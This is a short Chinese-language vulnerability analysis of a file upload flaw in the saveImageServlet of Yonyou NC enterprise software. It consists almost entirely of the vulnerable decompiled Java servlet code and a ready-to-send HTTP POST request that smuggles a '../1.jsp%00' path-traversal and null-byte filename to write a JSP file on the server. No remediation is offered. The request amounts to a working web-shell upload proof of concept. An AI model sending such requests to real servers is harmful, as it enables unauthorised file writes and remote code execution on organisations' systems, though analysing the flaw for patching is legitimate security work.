用友NC saveImageServlet 文件上传漏洞分析

package nc.uap.wfm.action;@Servlet(path="/servlet/saveImageServlet")public class SaveImageServletextends WfBaseServlet {    private static final long serialVersionUID = -5603687395645617927L;    @Action(method="POST")    public void doPost() throws ServletException, IOException {        this.response.setContentType("application/octet-stream");        String filename = this.request.getParameter("filename");        if (filename == null || "".equals(filename)) {            filename = UUID.randomUUID().toString();        }        filename = filename + ".png";        String savePath = this.request.getRealPath("") + "/processxml/images/" + filename;        ServletInputStream is = this.request.getInputStream();        FilterOutputStream dos = null;        try {            int size = 0;            byte[] tmp = new byte[10240];            File f = new File(savePath);            dos = new DataOutputStream(new FileOutputStream(f));            int len = -1;            while ((len = is.read(tmp)) != -1) {                ((DataOutputStream)dos).write(tmp, 0, len);                size += len;            }            ((DataOutputStream)dos).flush();            dos.close();        }        catch (IOException e) {            WfmLogger.error((String)e.getMessage(), (Throwable)e);            throw new LfwRuntimeException(e.getMessage());        }        finally {            try {                if (is != null) {                    is.close();                }            }            catch (Exception e) {                WfmLogger.error((Throwable)e);            }            try {                if (dos != null) {                    dos.close();                }            }            catch (Exception e) {                WfmLogger.error((Throwable)e);            }        }    }}

POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../1.jsp%00 HTTP/1.1Host: 5Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 19111